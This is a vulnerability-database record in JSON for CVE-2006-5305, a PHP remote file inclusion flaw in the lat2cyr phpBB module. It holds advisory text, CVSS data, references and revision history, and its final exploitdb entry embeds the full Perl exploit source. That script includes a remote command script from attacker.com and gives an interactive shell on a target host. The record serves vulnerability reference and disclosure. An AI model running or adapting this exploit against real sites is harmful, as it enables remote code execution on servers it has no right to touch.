ID CVE-2006-5305Type cveReporter NVDModified 2017-10-18T21:29:32
Description
PHP remote file inclusion vulnerability in lat2cyr.php in the lat2cyr 1.0.1 and earlier phpbb module allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
{"id": "CVE-2006-5305", "bulletinFamily": "NVD", "title": "CVE-2006-5305", "description": "PHP remote file inclusion vulnerability in lat2cyr.php in the lat2cyr 1.0.1 and earlier phpbb module allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "published": "2006-10-17T11:07:00", "modified": "2017-10-18T21:29:32", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5305", "reporter": "NVD", "references": ["http://www.securityfocus.com/bid/20513", "http://www.vupen.com/english/advisories/2006/4050", "https://www.exploit-db.com/exploits/2546", "https://exchange.xforce.ibmcloud.com/vulnerabilities/29572", "http://www.securityfocus.com/archive/1/archive/1/448660/100/0/threaded", "http://securityreason.com/securityalert/1729"], "cvelist": ["CVE-2006-5305"], "type": "cve", "lastseen": "2017-10-19T11:12:34", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:phpbb:lat2cyr:1.0.1"], "cvelist": ["CVE-2006-5305"], "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHP remote file inclusion vulnerability in lat2cyr.php in the lat2cyr 1.0.1 and earlier phpbb module allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 1, "enchantments": {}, "hash": "080b31b7b6beccc6a688fbc06a899ee313a134d8bb9b48d1d3528fc4bcebf0e1", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "60c9af82ccef3685ed592c94930a7212", "key": "href"}, {"hash": "706cfd92e4017053a1361281d2739899", "key": "title"}, {"hash": "46ea2c8a5357467483784cd4ed40c450", "key": "description"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "88e04999358e76acae57a21bcf224d40", "key": "cvss"}, {"hash": "f6b4172771a4037ddba687835d138152", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a31103a2c68f5bad9f83eae43337dac8", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "3dc76829fcbe4092fad84595ae83b9a1", "key": "published"}, {"hash": "ef4655de30652fd550c836c211fdd470", "key": "modified"}, {"hash": "29ed29a1dca72ff2b7f2a319c9afe47b", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5305", "id": "CVE-2006-5305", "lastseen": "2016-09-03T07:41:57", "modified": "2011-03-07T21:42:57", "objectVersion": "1.2", "published": "2006-10-17T11:07:00", "references": ["http://www.securityfocus.com/bid/20513", "http://www.vupen.com/english/advisories/2006/4050", "http://www.securityfocus.com/archive/1/archive/1/448660/100/0/threaded", "http://xforce.iss.net/xforce/xfdb/29572", "http://securityreason.com/securityalert/1729", "http://milw0rm.com/exploits/2546"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-5305", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T07:41:57"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:phpbb:lat2cyr:1.0.1"], "cvelist": ["CVE-2006-5305"], "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "PHP remote file inclusion vulnerability in lat2cyr.php in the lat2cyr 1.0.1 and earlier phpbb module allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 2, "enchantments": {}, "hash": "af0ab840816ab8b57523c2d0fd24e9530bcc0e25d346b77a3bc12dcede0c394e", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "60c9af82ccef3685ed592c94930a7212", "key": "href"}, {"hash": "706cfd92e4017053a1361281d2739899", "key": "title"}, {"hash": "46ea2c8a5357467483784cd4ed40c450", "key": "description"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "2189c0deb183ba84ce84b02344e82736", "key": "references"}, {"hash": "88e04999358e76acae57a21bcf224d40", "key": "cvss"}, {"hash": "f6b4172771a4037ddba687835d138152", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "8c97991a3104e38489a7d06cdf4dd4f9", "key": "modified"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "3dc76829fcbe4092fad84595ae83b9a1", "key": "published"}, {"hash": "29ed29a1dca72ff2b7f2a319c9afe47b", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5305", "id": "CVE-2006-5305", "lastseen": "2017-07-20T10:49:35", "modified": "2017-07-19T21:33:40", "objectVersion": "1.3", "published": "2006-10-17T11:07:00", "references": ["http://www.securityfocus.com/bid/20513", "http://www.vupen.com/english/advisories/2006/4050", "https://exchange.xforce.ibmcloud.com/vulnerabilities/29572", "http://www.securityfocus.com/archive/1/archive/1/448660/100/0/threaded", "http://securityreason.com/securityalert/1729", "http://milw0rm.com/exploits/2546"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-5305", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-07-20T10:49:35"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "29ed29a1dca72ff2b7f2a319c9afe47b"}, {"key": "cvelist", "hash": "f6b4172771a4037ddba687835d138152"}, {"key": "cvss", "hash": "88e04999358e76acae57a21bcf224d40"}, {"key": "description", "hash": "46ea2c8a5357467483784cd4ed40c450"}, {"key": "href", "hash": "60c9af82ccef3685ed592c94930a7212"}, {"key": "modified", "hash": "19f3cbfc187aea476f9b28f22fb1692e"}, {"key": "published", "hash": "3dc76829fcbe4092fad84595ae83b9a1"}, {"key": "references", "hash": "734d89946c4cc255463e7741305ebb8f"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "706cfd92e4017053a1361281d2739899"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "ef1681d2989e36b7f47214252fb42638c2d03ec238e945a6f10eff2445ebb30a", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-10-19T11:12:34"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:phpbb:lat2cyr:1.0.1"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"osvdb": [{"lastseen": "2017-04-28T13:20:26", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.phpbbhacks.com/download/4808\n[Secunia Advisory ID:22432](https://secuniaresearch.flexerasoftware.com/advisories/22432/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0220.html\nISS X-Force ID: 29572\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2546\nFrSIRT Advisory: ADV-2006-4050\n[CVE-2006-5305](https://vulners.com/cve/CVE-2006-5305)\nBugtraq ID: 20513\n", "reporter": "OSVDB", "published": "2006-10-12T11:48:57", "title": "lat2cyr for phpBB lat2cyr.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-5305"], "modified": "2006-10-12T11:48:57", "href": "https://vulners.com/osvdb/OSVDB:29736", "id": "OSVDB:29736", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:31:19", "osvdbidlist": ["29736"], "references": [], "edition": 1, "description": "phpBB lat2cyr Mod 1.0.1 (lat2cyr.php) Remote File Include Exploit. CVE-2006-5305. Webapps exploit for php platform", "reporter": "Nima Salehi", "published": "2006-10-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "phpBB lat2cyr Mod 1.0.1 lat2cyr.php Remote File Include Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5305"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:2546", "href": "https://www.exploit-db.com/exploits/2546/", "sourceData": "#!/usr/bin/perl\n \n#####################################################################################################\n# #\n# phpBB lat2cyr 1.0.1 #\n# #\n# Class: Remote File Include Vulnerability #\n# #\n# Patch: unavailable #\n# #\n# Date: 2006/10/12 #\n# #\n# Remote: Yes #\n# #\n# Type: high #\n# #\n# Site: http://www.phpbbhacks.com/download/4808 #\n# #\n#####################################################################################################\n\n\nuse IO::Socket;\nuse LWP::Simple;\n\n$cmdshell=\"http://attacker.com/cmd.txt\"; # <====== Change This Line With Your Personal Script\n\nprint \"\\n\";\nprint \"##########################################################################\\n\";\nprint \"# #\\n\";\nprint \"# phpBB lat2cyr <= 1.0.1 Remote File Include Vulnerability #\\n\";\nprint \"# Bug found By : Ashiyane Corporation #\\n\";\nprint \"# Email: nima salehi nima[at]ashiyane.ir #\\n\";\nprint \"# Web Site : www.Ashiyane.ir #\\n\";\nprint \"# #\\n\";\nprint \"##########################################################################\\n\";\n\n\nif (@ARGV < 2)\n{\n print \"\\n Usage: Ashiyane.pl [host] [path] \";\n print \"\\n EX : Ashiyane.pl www.victim.com /path/ \\n\\n\";\nexit;\n}\n\n\n$host=$ARGV[0];\n$path=$ARGV[1];\n$vul=\"lat2cyr.php?phpbb_root_path=\"\n\nprint \"Type Your Commands ( uname -a )\\n\";\nprint \"For Exiit Type END\\n\";\n\nprint \"<Shell> \";$cmd = <STDIN>;\n\nwhile($cmd !~ \"END\") {\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\n\n print $socket \"GET \".$path.$vul.$cmdshell.\"?cmd=\".$cmd.\"? HTTP/1.1\\r\\n\";\n print $socket \"Host: \".$host.\"\\r\\n\";\n print $socket \"Accept: */*\\r\\n\";\n print $socket \"Connection: close\\r\\n\\n\";\n\n while ($raspuns = <$socket>)\n {\n print $raspuns;\n }\n\n print \"<Shell> \";\n $cmd = <STDIN>;\n}\n\n# milw0rm.com [2006-10-13]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2546/"}]}
